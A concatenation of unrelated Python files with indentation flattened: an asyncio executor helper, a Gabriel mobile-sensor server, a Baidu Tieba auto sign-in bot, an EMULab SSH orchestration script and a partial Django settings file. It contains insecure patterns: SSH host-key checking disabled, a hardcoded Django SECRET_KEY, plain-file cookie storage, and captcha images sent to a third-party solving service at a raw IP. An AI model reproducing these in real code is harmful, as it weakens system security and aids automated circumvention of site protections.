Sets and starts the event loop
Parameters
----------
loop : asyncio.AbstractEventLoop
The event loop to use
"""
asyncio.set_event_loop(loop)
loop.run_forever()
def run_in_executor(f):
"""
Passes a synchronous & blocking function off to another thread so that it can be awaited
Parameters
----------
f
The function to transform into an awaitable
Returns
-------
inner : callable
An awaitable version of the function with the execution delegated to another thread
"""
@functools.wraps(f)
def inner(*args, **kwargs):
loop = asyncio.get_running_loop()
return loop.run_in_executor(
# If the function to be wrapped has been provided with a thread pool use that, otherwise create one
kwargs.get("thread_pool", ThreadPool(5).thread_pool),
lambda: f(*args, **kwargs),
)
return inner
class ThreadPool:
"""
Creates a class which has a thread pool.
"""
def __init__(self, max_workers):
self.thread_pool = concurrent.futures.ThreadPoolExecutor(
max_workers=max_workers
)
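# --- Usage sketch (illustrative addition, not part of the original module). ---
# Decorating a blocking function with run_in_executor makes it awaitable without
# blocking the event loop; `_blocking_square` is a made-up example function.
if __name__ == "__main__":
    import time

    @run_in_executor
    def _blocking_square(x):
        time.sleep(0.1)  # stand-in for blocking I/O or CPU-bound work
        return x * x

    async def _demo():
        # The sleep runs in a worker thread; the coroutine just awaits the result.
        return await _blocking_square(7)

    print(asyncio.run(_demo()))  # -> 49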
|
mobile_server.py
|
#!/usr/bin/env python
#
# Cloudlet Infrastructure for Mobile Computing
#
# Author: Kiryong Ha <krha@cmu.edu>
# Zhuo Chen <zhuoc@cs.cmu.edu>
#
# Copyright (C) 2011-2013 Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import multiprocessing
import os
import queue
import select
import socket
import socketserver
import struct
import sys
import threading
import time
import traceback
import base64
import gabriel
LOG = gabriel.logging.getLogger(__name__)
image_queue_list = list()
acc_queue_list = list()
audio_queue_list = list()
gps_queue_list = list()
# a global queue that contains final messages sent back to the client
result_queue = multiprocessing.Queue()
# a global queue that contains control messages to be sent to the client
command_queue = multiprocessing.Queue()
# a global queue used to publish input streams in a web server for debugging purposes
input_display_queue = multiprocessing.Queue(1)
# a global queue used to publish output streams in a web server for debugging purposes
output_display_queue_dict = {'image': multiprocessing.Queue(1),
'debug': multiprocessing.Queue(1),
'text': multiprocessing.Queue(3),
'video': multiprocessing.Queue(3)}
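# Wire format shared by the handlers below: each message starts with a 4-byte
# big-endian header length ("!I") followed by the JSON header; sensor messages
# additionally carry a 4-byte big-endian payload length followed by the raw
# payload (JPEG frame, accelerometer samples, audio chunk, ...).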
class MobileCommError(Exception):
pass
class MobileSensorHandler(gabriel.network.CommonHandler):
def setup(self):
super(MobileSensorHandler, self).setup()
if gabriel.Debug.LOG_STAT:
self.init_connect_time = None
self.previous_time = None
def handle(self):
LOG.info("Mobile client is connected for (%s)" % str(self))
if gabriel.Debug.LOG_STAT:
self.init_connect_time = time.time()
self.previous_time = time.time()
super(MobileSensorHandler, self).handle()
class MobileControlHandler(MobileSensorHandler):
'''
    The control server that
    1) receives control messages from the client (e.g. ping to synchronize time)
    2) delivers sensor control messages from the applications
'''
def setup(self):
super(MobileControlHandler, self).setup()
# flush out old result at Queue
while not command_queue.empty():
command_queue.get()
self.data_queue = command_queue
def __repr__(self):
return "Mobile Control Server"
def _handle_input_data(self):
## receive data
header_size = struct.unpack("!I", self._recv_all(4))[0]
header_data = self._recv_all(header_size)
header_json = json.loads(header_data)
# if "sync_time" field exists in the header, then this is a time sync request
# and a local time is returned immediately
if header_json.get("sync_time") is not None:
header_json["sync_time"] = int(time.time() * 1000) # in millisecond
header_data = json.dumps(header_json)
packet = struct.pack("!I%ds" % len(header_data), len(header_data), header_data)
self.request.send(packet)
self.wfile.flush()
return
def _handle_queue_data(self):
try:
cmd_data = self.data_queue.get(timeout = 0.0001)
cmd_json = json.loads(cmd_data)
if isinstance(cmd_json, list):
for cmd_j in cmd_json:
cmd_data = json.dumps(cmd_j)
packet = struct.pack("!I%ds" % len(cmd_data), len(cmd_data), cmd_data)
self.request.send(packet)
self.wfile.flush()
LOG.info("command sent to mobile device: %s", cmd_data)
else:
## send return data to the mobile device
packet = struct.pack("!I%ds" % len(cmd_data), len(cmd_data), cmd_data)
self.request.send(packet)
self.wfile.flush()
LOG.info("command sent to mobile device: %s", cmd_data)
except queue.Empty:
LOG.warning("data queue shouldn't be empty! - %s" % str(self))
class MobileVideoHandler(MobileSensorHandler):
'''
The video stream server that
1) takes MJPEG streams as input, and
    2) puts the image data into queues that are then sent to different cognitive engines
    Optionally, it can also synchronize time with the client
'''
def setup(self):
super(MobileVideoHandler, self).setup()
if gabriel.Debug.LOG_STAT:
self.frame_count = 0
self.total_recv_size = 0
if gabriel.Debug.SAVE_IMAGES:
if not os.path.exists(gabriel.Const.LOG_IMAGES_PATH):
os.makedirs(gabriel.Const.LOG_IMAGES_PATH)
self.log_images_counter = 0
self.log_images_timing = open(os.path.join(gabriel.Const.LOG_IMAGES_PATH, "timing.txt"), "w")
if gabriel.Debug.SAVE_VIDEO:
self.log_video_writer_created = False
def __repr__(self):
return "Mobile Video Server"
def _handle_input_data(self):
## receive data
header_size = struct.unpack("!I", self._recv_all(4))[0]
header_data = self._recv_all(header_size)
image_size = struct.unpack("!I", self._recv_all(4))[0]
image_data = self._recv_all(image_size)
## the gabriel test app that does nothing...
if gabriel.Debug.DIRECT_RETURN:
packet = struct.pack("!I%ds" % len(header_data),
len(header_data), header_data)
self.request.send(packet)
self.wfile.flush()
## add header data for measurement
if gabriel.Debug.TIME_MEASUREMENT:
header_json = json.loads(header_data)
header_json[gabriel.Protocol_measurement.JSON_KEY_CONTROL_RECV_FROM_MOBILE_TIME] = time.time()
header_data = json.dumps(header_json)
## stats
if gabriel.Debug.LOG_STAT:
self.frame_count += 1
current_time = time.time()
self.total_recv_size += (header_size + image_size + 8)
current_FPS = 1 / (current_time - self.previous_time)
self.previous_time = current_time
average_FPS = self.frame_count / (current_time - self.init_connect_time)
if (self.frame_count % 100 == 0):
log_msg = "Video FPS : current(%f), avg(%f), BW(%f Mbps), offloading engine(%d)" % \
(current_FPS, average_FPS, 8 * self.total_recv_size / (current_time - self.init_connect_time) / 1000 / 1000, len(image_queue_list))
LOG.info(log_msg)
## put current image data in all registered cognitive engine queue
for image_queue in image_queue_list:
if image_queue.full():
try:
image_queue.get_nowait()
except queue.Empty as e:
pass
try:
image_queue.put_nowait((header_data, image_data))
except queue.Full as e:
pass
## display input stream for debug purpose
if gabriel.Debug.WEB_SERVER:
if input_display_queue.full():
try:
input_display_queue.get_nowait()
except queue.Empty as e:
pass
try:
input_display_queue.put_nowait(image_data)
except queue.Full as e:
pass
## write images into files
if gabriel.Debug.SAVE_IMAGES:
self.log_images_counter += 1
            with open(os.path.join(gabriel.Const.LOG_IMAGES_PATH, "frame-" + gabriel.util.add_preceding_zeros(self.log_images_counter) + ".jpeg"), "wb") as f:
f.write(image_data)
if self.log_images_timing is not None:
self.log_images_timing.write("%d,%d\n" % (self.log_images_counter, int(time.time() * 1000)))
## write images into a video
if gabriel.Debug.SAVE_VIDEO:
import cv2
import numpy as np
            img_array = np.asarray(bytearray(image_data), dtype=np.uint8)
cv_image = cv2.imdecode(img_array, -1)
print(cv_image.shape)
if not self.log_video_writer_created:
self.log_video_writer_created = True
                self.log_video_writer = cv2.VideoWriter(gabriel.Const.LOG_VIDEO_PATH, cv2.VideoWriter_fourcc('X', 'V', 'I', 'D'), 10, (cv_image.shape[1], cv_image.shape[0]))
self.log_video_writer.write(cv_image)
class MobileAccHandler(MobileSensorHandler):
def setup(self):
super(MobileAccHandler, self).setup()
if gabriel.Debug.LOG_STAT:
self.frame_count = 0
self.total_recv_size = 0
if gabriel.Debug.SAVE_ACC:
self.acc_log = open(gabriel.Const.LOG_ACC_PATH, "w")
def __repr__(self):
return "Mobile Acc Server"
def chunks(self, data, n):
for i in range(0, len(data), n):
yield data[i : i + n]
def _handle_input_data(self):
header_size = struct.unpack("!I", self._recv_all(4))[0]
header_data = self._recv_all(header_size)
acc_size = struct.unpack("!I", self._recv_all(4))[0]
acc_data = self._recv_all(acc_size)
## stats
if gabriel.Debug.LOG_STAT:
self.frame_count += 1
current_time = time.time()
self.total_recv_size += (header_size + acc_size + 8)
current_FPS = 1 / (current_time - self.previous_time)
self.previous_time = current_time
average_FPS = self.frame_count / (current_time - self.init_connect_time)
if (self.frame_count % 100 == 0):
log_msg = "ACC FPS : current(%f), avg(%f), BW(%f Mbps), offloading engine(%d)" % \
(current_FPS, average_FPS, 8 * self.total_recv_size / (current_time - self.init_connect_time) / 1000 / 1000, len(acc_queue_list))
LOG.info(log_msg)
## log acc data
if gabriel.Debug.SAVE_ACC:
ACC_SEGMENT_SIZE = 12 # (float, float, float)
t = int(time.time() * 1000)
for chunk in self.chunks(acc_data, ACC_SEGMENT_SIZE):
(acc_x, acc_y, acc_z) = struct.unpack("!fff", chunk)
self.acc_log.write("%d,%f,%f,%f\n" % (t, acc_x, acc_y, acc_z))
## put current acc data in all registered cognitive engine queue
for acc_queue in acc_queue_list:
if acc_queue.full():
try:
acc_queue.get_nowait()
except queue.Empty as e:
pass
try:
acc_queue.put_nowait((header_data, acc_data))
except queue.Full as e:
pass
class MobileAudioHandler(MobileSensorHandler):
def setup(self):
super(MobileAudioHandler, self).setup()
if gabriel.Debug.LOG_STAT:
self.frame_count = 0
self.total_recv_size = 0
def __repr__(self):
return "Mobile Audio Server"
def _handle_input_data(self):
## receive data
header_size = struct.unpack("!I", self._recv_all(4))[0]
header_data = self._recv_all(header_size)
header_json = json.loads(header_data)
audio_size = struct.unpack("!I", self._recv_all(4))[0]
audio_data = self._recv_all(audio_size)
## stats
if gabriel.Debug.LOG_STAT:
self.frame_count += 1
current_time = time.time()
self.total_recv_size += (header_size + audio_size + 8)
current_FPS = 1 / (current_time - self.previous_time)
self.previous_time = current_time
average_FPS = self.frame_count / (current_time - self.init_connect_time)
if (self.frame_count % 100 == 0):
log_msg = "Audio FPS : current(%f), avg(%f), BW(%f Mbps), offloading engine(%d)" % \
(current_FPS, average_FPS, 8 * self.total_recv_size / (current_time - self.init_connect_time) / 1000 / 1000, len(audio_queue_list))
LOG.info(log_msg)
## put current audio data in all registered cognitive engine queue
for audio_queue in audio_queue_list:
if audio_queue.full():
try:
audio_queue.get_nowait()
except queue.Empty as e:
pass
try:
audio_queue.put((header_data, audio_data))
except queue.Full as e:
pass
class MobileResultHandler(MobileSensorHandler):
def setup(self):
super(MobileResultHandler, self).setup()
# flush out old result at Queue
while not result_queue.empty():
result_queue.get()
self.data_queue = result_queue
if gabriel.Debug.TIME_MEASUREMENT:
self.time_breakdown_log = open("log-time-breakdown.txt", "w")
def __repr__(self):
return "Mobile Result Server"
@staticmethod
def _add_data_to_debug_server(rtn_header_json, rtn_data_json):
"""Add data to debug server.
Debug server accepts 4 types of data: annotated input image with detected object, video instruction,
image instruction, and text instruction. It only supports instructions in json format (legacy).
"""
        # only the annotated debug image is in the header; everything else is in the data
image_encoded = rtn_header_json.get(gabriel.Protocol_debug.JSON_KEY_ANNOTATED_INPUT_IMAGE, None)
if image_encoded is not None:
image_data = base64.b64decode(image_encoded)
if output_display_queue_dict['debug'].full():
try:
output_display_queue_dict['debug'].get_nowait()
except queue.Empty as e:
pass
try:
output_display_queue_dict['debug'].put_nowait(image_data)
except queue.Full as e:
pass
# image response
image_encoded = rtn_data_json.get('image', None)
if image_encoded is not None:
image_data = base64.b64decode(image_encoded)
if output_display_queue_dict['image'].full():
try:
output_display_queue_dict['image'].get_nowait()
except queue.Empty as e:
pass
try:
output_display_queue_dict['image'].put_nowait(image_data)
except queue.Full as e:
pass
# text response
text_data = rtn_data_json.get('speech', None)
if text_data is not None:
if output_display_queue_dict['text'].full():
try:
output_display_queue_dict['text'].get_nowait()
except queue.Empty as e:
pass
try:
output_display_queue_dict['text'].put_nowait(text_data)
except queue.Full as e:
pass
# video response
video_url = rtn_data_json.get('video', None)
if video_url is not None:
if output_display_queue_dict['video'].full():
try:
output_display_queue_dict['video'].get_nowait()
except queue.Empty as e:
pass
try:
output_display_queue_dict['video'].put_nowait(video_url)
except queue.Full as e:
pass
@staticmethod
def _remove_debug_header_fields(rtn_header_json):
rtn_header_json.pop(gabriel.Protocol_debug.JSON_KEY_ANNOTATED_INPUT_IMAGE, None)
def _handle_queue_data(self):
try:
(rtn_header, rtn_data) = self.data_queue.get(timeout = 0.0001)
rtn_header_json = json.loads(rtn_header)
## log measured time
if gabriel.Debug.TIME_MEASUREMENT:
frame_id = rtn_header_json[gabriel.Protocol_client.JSON_KEY_FRAME_ID]
now = time.time()
control_recv_from_mobile_time = rtn_header_json.get(gabriel.Protocol_measurement.JSON_KEY_CONTROL_RECV_FROM_MOBILE_TIME, -1)
app_recv_time = rtn_header_json.get(gabriel.Protocol_measurement.JSON_KEY_APP_RECV_TIME, -1)
app_sent_time = rtn_header_json.get(gabriel.Protocol_measurement.JSON_KEY_APP_SENT_TIME, -1)
symbolic_done_time = rtn_header_json.get(gabriel.Protocol_measurement.JSON_KEY_APP_SYMBOLIC_TIME, -1)
ucomm_recv_time = rtn_header_json.get(gabriel.Protocol_measurement.JSON_KEY_UCOMM_RECV_TIME, -1)
ucomm_sent_time = rtn_header_json.get(gabriel.Protocol_measurement.JSON_KEY_UCOMM_SENT_TIME, -1)
# no need to send the time info back to the client
rtn_header_json.pop(gabriel.Protocol_measurement.JSON_KEY_CONTROL_RECV_FROM_MOBILE_TIME, None)
rtn_header_json.pop(gabriel.Protocol_measurement.JSON_KEY_APP_SENT_TIME, None)
rtn_header_json.pop(gabriel.Protocol_measurement.JSON_KEY_APP_RECV_TIME, None)
rtn_header_json.pop(gabriel.Protocol_measurement.JSON_KEY_UCOMM_RECV_TIME, None)
rtn_header_json.pop(gabriel.Protocol_measurement.JSON_KEY_UCOMM_SENT_TIME, None)
rtn_header_json.pop(gabriel.Protocol_measurement.JSON_KEY_APP_SYMBOLIC_TIME, None)
if self.time_breakdown_log is not None:
self.time_breakdown_log.write("%s\t%f\t%f\t%f\t%f\t%f\t%f\t%f\n" %
(frame_id, control_recv_from_mobile_time, app_recv_time, symbolic_done_time, app_sent_time, ucomm_recv_time, ucomm_sent_time, now))
if gabriel.Debug.WEB_SERVER:
if gabriel.Const.LEGACY_JSON_ONLY_RESULT:
rtn_data_json = json.loads(rtn_data)
self._add_data_to_debug_server(rtn_header_json, rtn_data_json)
else:
                    raise NotImplementedError("Debug server only supports legacy mode!")
self._remove_debug_header_fields(rtn_header_json)
## send return data to the mobile device
# packet format: header size, header, data
# add data size as a field in header for backward compatibility
rtn_header_json[gabriel.Protocol_client.JSON_KEY_DATA_SIZE]=len(rtn_data)
rtn_header = json.dumps(rtn_header_json)
if gabriel.Const.LEGACY_JSON_ONLY_RESULT:
rtn_header_json[gabriel.Protocol_client.JSON_KEY_RESULT_MESSAGE]=rtn_data
rtn_header=json.dumps(rtn_header_json)
packet = struct.pack("!I{}s".format(len(rtn_header)), len(rtn_header), rtn_header)
LOG.info("message sent to the Glass: %s", gabriel.util.print_rtn(rtn_header_json))
else:
packet = struct.pack("!I{}s{}s".format(len(rtn_header),len(rtn_data)), len(rtn_header), rtn_header, rtn_data)
LOG.info("message sent to the Glass: %s", gabriel.util.print_rtn(rtn_header_json))
self.request.send(packet)
self.wfile.flush()
except queue.Empty:
LOG.warning("data queue shouldn't be empty! - %s" % str(self))
class MobileCommServer(gabriel.network.CommonServer):
def __init__(self, port, handler):
gabriel.network.CommonServer.__init__(self, port, handler) # cannot use super because it's old style class
LOG.info("* Mobile server(%s) configuration" % str(self.handler))
LOG.info(" - Open TCP Server at %s" % (str(self.server_address)))
LOG.info(" - Disable nagle (No TCP delay) : %s" %
str(self.socket.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)))
LOG.info("-" * 50)
def terminate(self):
gabriel.network.CommonServer.terminate(self)
def main():
video_server = MobileCommServer(gabriel.Const.MOBILE_SERVER_VIDEO_PORT, MobileVideoHandler)
video_thread = threading.Thread(target=video_server.serve_forever)
video_thread.daemon = True
acc_server = MobileCommServer(gabriel.Const.MOBILE_SERVER_ACC_PORT, MobileAccHandler)
acc_thread = threading.Thread(target=acc_server.serve_forever)
acc_thread.daemon = True
audio_server = MobileCommServer(gabriel.Const.MOBILE_SERVER_AUDIO_PORT, MobileAudioHandler)
audio_thread = threading.Thread(target=audio_server.serve_forever)
audio_thread.daemon = True
try:
video_thread.start()
acc_thread.start()
audio_thread.start()
while True:
time.sleep(100)
except KeyboardInterrupt as e:
sys.stdout.write("Exit by user\n")
video_server.terminate()
acc_server.terminate()
audio_server.terminate()
sys.exit(1)
except Exception as e:
sys.stderr.write(str(e))
video_server.terminate()
acc_server.terminate()
audio_server.terminate()
sys.exit(1)
else:
video_server.terminate()
acc_server.terminate()
audio_server.terminate()
sys.exit(0)
if __name__ == '__main__':
main()
|
tieba_sign.py
|
#!/usr/bin/env python3
#coding=utf-8
import hashlib
import json
import os
import prettytable as pt
import pyzbar.pyzbar as pyzbar
import requests
import time
from io import BytesIO
from PIL import Image
from random import choice
from threading import Thread
class Tieba(object):
def __init__(self, users):
self.users = users
self.tb = pt.PrettyTable()
self.s = requests.session()
self.MD5_KEY = 'tiebaclient!!!'
self.CAPTCHA_API = 'http://222.187.238.211:10086/b'
self.INDEX_URL = 'https://tieba.baidu.com/index.html'
self.TBS_URL = 'http://tieba.baidu.com/dc/common/tbs'
self.LIKES_URL = 'http://c.tieba.baidu.com/c/f/forum/like'
self.SIGN_URL = 'http://c.tieba.baidu.com/c/c/forum/sign'
self.GEN_IMG_URL = 'https://tieba.baidu.com/cgi-bin/genimg'
self.QR_CODE_URL = 'https://passport.baidu.com/v2/api/getqrcode'
self.UNICAST_URL = 'https://passport.baidu.com/channel/unicast'
self.USER_INFO_URL = 'https://tieba.baidu.com/f/user/json_userinfo'
self.QR_LOGIN_URL = 'https://passport.baidu.com/v3/login/main/qrbdusslogin'
self.HAO123_URL = 'https://user.hao123.com/static/crossdomain.php'
self.MY_LIKE_URL = 'http://tieba.baidu.com/f/like/mylike'
self.ALL_TIEBA_LIST = []
self.tb.field_names = ['贴吧', '状态']
self.headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'c.tieba.baidu.com',
'User-Agent': 'bdtb for Android 10.3.8.10'
}
def get_time_stamp(self):
return str(int(time.time() * 1000))
def save_cookie(self, user):
cookie_dict = self.s.cookies.get_dict()
with open('.%s' % user, 'w') as f:
json.dump(cookie_dict, f)
f.close()
def load_cookie(self, user):
with open('.%s' % user, 'r') as f:
cookie_dict = json.loads(f.read())
f.close()
for k, v in cookie_dict.items():
self.s.cookies.set(k, v)
def unicast(self, channel_id):
tt = self.get_time_stamp()
r = self.s.get(
url = self.UNICAST_URL,
params = {
'channel_id': channel_id,
'tpl': 'tb',
'apiver': 'v3',
'callback': '',
'tt': tt,
'_': tt
}
)
rsp = r.text.replace('(','').replace(')','')
rsp_json = json.loads(rsp)
try:
channel_v = json.loads(rsp_json['channel_v'])
return channel_v
except:
print('扫描超时')
def qr_login_set_cookie(self, bduss):
tt = self.get_time_stamp()
r = self.s.get(
url = self.QR_LOGIN_URL,
params = {
'v': tt,
'bduss': bduss,
'u': self.INDEX_URL,
'loginVersion': 'v4',
'qrcode': '1',
'tpl': 'tb',
'apiver': 'v3',
'tt': tt,
'alg': 'v1',
'time': tt[10:]
}
)
rsp = json.loads(r.text.replace("'",'"').replace('\\', '\\\\'))
bdu = rsp['data']['hao123Param']
self.s.get(f'{self.HAO123_URL}?bdu={bdu}&t={tt}')
self.s.get(self.MY_LIKE_URL)
def down_qr_code(self, imgurl):
r = self.s.get(f'https://{imgurl}')
with open('qrcode.png', 'wb') as f:
f.write(r.content)
f.close()
def read_qr_code(self, imgurl):
self.down_qr_code(imgurl)
img = Image.open('qrcode.png')
barcodes = pyzbar.decode(img)
for barcode in barcodes:
barcodeData = barcode.data.decode("utf-8")
return barcodeData
def get_qr_code(self):
tt = self.get_time_stamp()
r = self.s.get(
url = self.QR_CODE_URL,
params = {
'lp': 'pc',
'qrloginfrom': 'pc',
'apiver': 'v3',
'tt': tt,
'tpl': 'tb',
'_': tt
}
)
app = input('有百度贴吧APP / 百度APP,请输入 1 ,没有请输入 2\n:')
imgurl = r.json()['imgurl']
while True:
if app == '1':
print(f'请使用浏览器打开二维码链接并使用百度贴吧APP / 百度APP扫描:https://{imgurl}')
print('注意:请使用IE浏览器打开二维码链接!!!')
break
elif app == '2':
qrurl = self.read_qr_code(imgurl)
os.remove('./qrcode.png')
print(f'请使用已经登录了百度贴吧网页端的浏览器打开链接并按照提示完成登陆:{qrurl}')
break
channel_id = r.json()['sign']
return channel_id
def qr_login(self, user):
channel_id = self.get_qr_code()
while True:
rsp = self.unicast(channel_id)
if rsp and rsp['status'] == 1: print('扫描成功,请在手机端确认登录!')
if rsp and rsp['status'] == 0:
print('确认登陆成功')
bduss = rsp['v']
self.qr_login_set_cookie(bduss)
self.save_cookie(user)
break
def login(self, user):
self.s.cookies.clear()
self.qr_login(user)
print('Login: True')
tiebas = self.get_like_tiebas()
self.ALL_TIEBA_LIST.extend(tiebas)
self.start(tiebas)
def check_login(self):
r = self.s.get(self.TBS_URL)
rsp = r.json()
return True if rsp['is_login'] == 1 else False
def calc_sign(self, str_dict):
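        # Tieba mobile-client signature: concatenate "key=value" for every item in
        # the dict (insertion order), append MD5_KEY, and take the uppercase MD5
        # hex digest.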
md5 = hashlib.md5()
md5.update((
''.join(
'%s=%s' % (k, v)
for k, v in str_dict.items()
) + self.MD5_KEY).encode('utf-8')
)
return md5.hexdigest().upper()
def get_bduss_stoken(self):
bduss = self.s.cookies.get_dict()['BDUSS']
stoken = self.s.cookies.get_dict()['STOKEN']
return bduss, stoken
def get_like_tiebas(self):
bduss, stoken = self.get_bduss_stoken()
data = {
'BDUSS': bduss,
'stoken': stoken,
'timestamp': self.get_time_stamp()
}
data['sign'] = self.calc_sign(data)
for _ in range(5):
try:
r = requests.post(
url = self.LIKES_URL,
data = data,
cookies = self.s.cookies,
headers = self.headers,
timeout=3
)
except:
continue
return [tieba['name'] for tieba in r.json()['forum_list']]
def get_tbs(self):
r = self.s.get(self.TBS_URL).json()
return r['tbs']
def recognize_captcha(self, remote_url, rec_times=3):
for _ in range(rec_times):
while True:
try:
response = requests.get(remote_url, timeout=6)
if response.text:
break
else:
print("retry, response.text is empty")
except Exception as ee:
print(ee)
files = {'image_file': ('captcha.jpg', BytesIO(response.content), 'application')}
r = requests.post(self.CAPTCHA_API, files=files)
try:
predict_text = json.loads(r.text)["value"]
return predict_text
except:
continue
def sign_with_vcode(self, tieba, tbs, captcha_input_str, captcha_vcode_str):
"""
        A captcha has not been required in practice so far,
        so this method only prints a notice for now.
"""
print(f'{tieba} 需要验证码')
def sign(self, tieba):
tbs = self.get_tbs()
bduss, stoken = self.get_bduss_stoken()
data = {
'BDUSS': bduss,
'kw': tieba,
'stoken': stoken,
'tbs': tbs,
'timestamp': self.get_time_stamp()
}
sign = self.calc_sign(data)
data['sign'] = sign
for _ in range(5):
try:
r = requests.post(
url = self.SIGN_URL,
data = data,
cookies = self.s.cookies,
headers = self.headers,
timeout=5
)
rsp = r.json()
break
except:
continue
try:
if rsp['user_info']['is_sign_in'] == 1:
self.tb.add_row([tieba, '签到成功'])
except:
            if rsp['error_msg'] == 'need vcode':  # unclear whether the mobile API ever requires a captcha
captcha_vcode_str = rsp['data']['captcha_vcode_str']
captcha_url = f'{self.GEN_IMG_URL}?{captcha_vcode_str}'
captcha_input_str = self.recognize_captcha(captcha_url)
self.sign_with_vcode(tieba, tbs, captcha_input_str, captcha_vcode_str)
else:
self.tb.add_row([tieba, rsp['error_msg']])
def start(self, tiebas):
threads = []
for tieba in tiebas:
t = Thread(target=self.sign, args=(tieba,))
threads.append(t)
for tieba in threads:
tieba.start()
for tieba in threads:
tieba.join()
def main(self):
start_time = time.time()
for user in self.users:
print(f'当前登陆: {user}')
if os.path.exists('.%s' % user):
self.load_cookie(user)
if self.check_login():
print('CookieLogin: True')
tiebas = self.get_like_tiebas()
self.ALL_TIEBA_LIST.extend(tiebas)
self.start(tiebas)
else:
print('%sCookies失效...正在重新登录...' % user)
self.login(user)
else:
self.login(user)
self.tb.align = 'l'
print(self.tb)
self.tb.clear_rows()
else:
end_time = time.time()
print('总共签到{}个贴吧,耗时:{}秒'.format(
len(self.ALL_TIEBA_LIST),
int(end_time - start_time)
)
)
if __name__ == "__main__":
    user_lists = ['']  # list of Tieba usernames, e.g. ['张三', '李四']
tieba = Tieba(user_lists)
tieba.main()
|
oversee.py
|
import sys
import json
import paramiko
import time
from threading import Thread, Lock
stdout_lock = Lock()
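# Overall flow: read a topology description (nodes/switches/links plus experiment and
# controller code) as JSON from stdin, connect to EMULab (ops.emulab.net), upload the
# topology and code over SFTP, start every physical node over SSH, then launch the
# control node and stream its output to stdout.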
def suckPipe(chan):
while not chan.exit_status_ready() or chan.recv_ready():
if chan.recv_ready():
data = chan.recv(1024)
stdout_lock.acquire()
sys.stdout.write(data)
stdout_lock.release()
def shellquote(s):
return "'" + s.replace("'", "'\\''") + "'"
def getSSHCmd(host, cmd):
return "ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no %s %s" % (host, shellquote(cmd))
def activatePhysicalNode(client, pnos):
def eachPhysicalNode(pno):
host = "node%d.onenet.infosphere" % pno
cmd = "cd onenet; sh start_node.sh %d" % pno
_, pout, _ = client.exec_command(getSSHCmd(host, cmd))
return pout
return map(eachPhysicalNode, pnos)
data = json.load(sys.stdin)
pnos = set(map(lambda n: n['pno'], data['nodes']))
sys.stdout.write("** Summary:\n")
sys.stdout.write("** %d nodes, %d switches, %d links\n" % (len(data['nodes']), len(data['switches']), len(data['links'])))
sys.stdout.write("** %d physical machines %s\n" % (len(pnos), list(pnos)))
sys.stdout.write("\n")
sys.stdout.write("** Connecting to EMULab\n")
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect('ops.emulab.net', username='mininet')
sftp = client.open_sftp()
sys.stdout.write("** Uploading topology\n")
with sftp.open('onenet/topo.js', 'w') as f:
f.write(json.dumps(data))
sys.stdout.write("** Uploading experiment code\n")
with sftp.open('onenet/experiment.py', 'w') as f:
f.write(data['code']['experiment'])
sys.stdout.write("** Uploading controller code\n")
with sftp.open('pox/pox/controller.py', 'w') as f:
f.write(data['code']['controller'])
sys.stdout.write("** Activating physical nodes\n")
pipes = activatePhysicalNode(client, pnos)
sys.stdout.write("** Activating the control node\n")
chan = client.get_transport().open_session()
chan.exec_command(getSSHCmd("c.onenet.infosphere", "sh onenet/start_control.sh"))
thd_control = Thread(target=suckPipe, args=(chan,))
thd_control.start()
thd_control.join()
|
settings.py
|
"""
Django settings for sandbox project.
Generated by 'django-admin startproject' using Django 2.2.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import logging
import os
import sys
import threading
import platform
from apscheduler.triggers.cron import CronTrigger
from docker.types import Ulimit
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+61drt2^c32qp)knvy32m*xm*ew=po%f8a9l!bp$kd7mz3(109'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
# Set to true when 'python3 manage.py test' is used
TESTING = sys.argv[1:2] == ['test']
ALLOWED_HOSTS = ['127.0.0.1']
# Application definition
INSTALLED_APPS = [
'sandbox',
]
MIDDLEWARE = [
'django_http_exceptions.middleware.ExceptionHandlerMiddleware',
'django_http_exceptions.middleware.ThreadLocalRequestMiddleware',
]
ROOT_URLCONF = 'urls'
WSGI_APPLICATION = 'wsgi.application'
# Database
DATABASES = dict()
# Needed for manage.py to run without database
TEST_RUNNER = 'testing.DatabaseLessTestRunner'
# Password validation
AUTH_PASSWORD_VALIDATORS = list()
# Write email in console instead of sending it if DEBUG is set to True
if DEBUG:
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Logger information
LOGGER_ADDRESS = '/dev/log'
if platform.system() == 'Darwin':
# https://docs.python.org/3/library/logging.handlers.html#sysloghandler
LOGGER_ADDRESS = '/var/run/syslog'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'formatters': {
'verbose': {
'format': ("[%(asctime)-15s] [%(pathname)s]"
"[%(filename)s:%(funcName)s:%(lineno)d]"
" %(levelname)s -- %(message)s"),
'datefmt': '%Y/%m/%d %H:%M:%S'
},
'simple': {
'format': ("[%(asctime)s] [%(filename)s:%(funcName)s:%(lineno)d]"
" %(levelname)s -- %(message)s"),
'datefmt': '%H:%M:%S'
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'syslog': {
'level': 'INFO',
'class': 'logging.handlers.SysLogHandler',
'facility': 'local6',
'address': LOGGER_ADDRESS,
'formatter': 'verbose',
'filters': ['require_debug_false'],
},
'syslog_debug': {
'level': 'DEBUG',
'class': 'logging.handlers.SysLogHandler',
'facility': 'local6',
'address': LOGGER_ADDRESS,
'formatter': 'verbose',
'filters': ['require_debug_true'],
},
'mail_admins': {
'level': 'WARNING',
'class': 'django.utils.log.AdminEmailHandler',
